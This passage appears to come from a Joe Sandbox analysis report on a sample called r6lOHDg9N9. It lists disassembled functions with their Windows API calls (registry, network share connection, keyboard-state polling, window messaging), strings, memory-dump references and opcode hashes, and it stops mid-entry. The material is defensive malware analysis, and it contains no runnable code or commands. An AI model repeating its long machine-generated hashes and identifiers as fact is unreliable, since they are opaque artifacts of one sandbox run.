                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                              • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                              • API String ID: 3052893215-4176887700
                                                                              • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                              • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                              • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                              • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                              Function 004582BF Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                              • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                              • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                              • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                              • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                              • String ID: Version$\TypeLib$interface\
                                                                              • API String ID: 656856066-939221531
                                                                              • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                              • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                              • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                              • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                              Function 0045E62E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 155COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                              • __swprintf.LIBCMT ref: 0045E6EE
                                                                              • _printf.LIBCMT ref: 0045E7A9
                                                                              • _printf.LIBCMT ref: 0045E7D2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString_printf$__swprintf_wcslen
                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 3590180749-2354261254
                                                                              • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                              • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                              • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                              • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                              Function 00452E2A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 154COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                              • String ID: %.15g$0x%p$False$True
                                                                              • API String ID: 3038501623-2263619337
                                                                              • Opcode ID: 8ea6ddc996ebef1c7950de8ae128e0744c87d41cbaff66ecd09c9901680fa350
                                                                              • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                              • Opcode Fuzzy Hash: 8ea6ddc996ebef1c7950de8ae128e0744c87d41cbaff66ecd09c9901680fa350
                                                                              • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                              Function 004580E1 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136registryshareCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • _memset.LIBCMT ref: 00458194
                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                              • API String ID: 2255324689-22481851
                                                                              • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                              • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                              • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                              • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                              Function 004584D6 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 105registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                              • __wcsicoll.LIBCMT ref: 004585D6
                                                                              • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                              • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                              • String ID: ($interface$interface\
                                                                              • API String ID: 2231185022-3327702407
                                                                              • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                              • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                              • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                              • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                              Function 00436582 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                              • String ID: 0.0.0.0
                                                                              • API String ID: 2691793716-3771769585
                                                                              • Opcode ID: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
                                                                              • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                              • Opcode Fuzzy Hash: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
                                                                              • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                              Function 00416B12 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                              • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                              • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                              • __lock.LIBCMT ref: 00416B8A
                                                                              • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                              • __lock.LIBCMT ref: 00416BAB
                                                                              • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                              • API String ID: 1028249917-2843748187
                                                                              • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                              • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                              • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                              • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                              Function 0044920C Relevance: 18.2, APIs: 12, Instructions: 243windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                              • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                              • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                              • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                              • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CharNext
                                                                              • String ID:
                                                                              • API String ID: 1350042424-0
                                                                              • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                              • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                              • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                              • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                              Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                              • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                              • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                              • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                              • GetKeyState.USER32(00000011), ref: 00453D15
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                              • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                              • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                              • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                              • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                              • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                              Function 00437DB1 Relevance: 18.2, APIs: 12, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                              • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                              • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                              • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                              • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                              • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                              Function 00436879 Relevance: 18.1, APIs: 12, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                              • String ID:
                                                                              • API String ID: 136442275-0
                                                                              • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                              • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                              • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                              • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                              Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
                                                                              • Opcode ID: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
                                                                              • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                              • Opcode Fuzzy Hash: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
                                                                              • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                              Function 00460473 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                              • _wcslen.LIBCMT ref: 00460502
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                              • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                              • String ID: ThumbnailClass
                                                                              • API String ID: 4123061591-1241985126
                                                                              • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                              • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
